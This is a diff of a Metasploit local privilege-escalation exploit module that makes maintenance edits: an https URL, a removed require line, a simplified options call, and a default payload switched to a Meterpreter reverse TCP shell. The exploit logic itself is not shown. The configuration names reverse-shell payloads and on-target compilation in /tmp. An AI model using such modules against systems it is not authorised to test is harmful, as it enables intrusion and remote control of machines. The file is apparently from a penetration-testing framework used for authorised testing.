@@ -1,10 +1,8 @@
 ##
-# This module requires Metasploit: http://metasploit.com/download
+# This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-require 'msf/core'
-
 class MetasploitModule < Msf::Exploit::Local
   Rank = GoodRanking
 
@@ -43,7 +41,7 @@ class MetasploitModule < Msf::Exploit::Local
           ],
         'DefaultOptions' =>
           {
-            'payload' => 'linux/x64/mettle/reverse_tcp',
+            'payload' => 'linux/x64/meterpreter/reverse_tcp',
             'PrependFork' => true,
             'WfsDelay' => 60 # we can chew up a lot of CPU for this, so we want to give time for payload to come through
             },
@@ -56,7 +54,7 @@ class MetasploitModule < Msf::Exploit::Local
         OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),
         OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', ['Auto', 'True', 'False']]),
         OptInt.new('MAXWAIT', [ true, 'Max seconds to wait for decrementation in seconds', 120 ])
-      ], self.class)
+      ])
   end
 
   def check
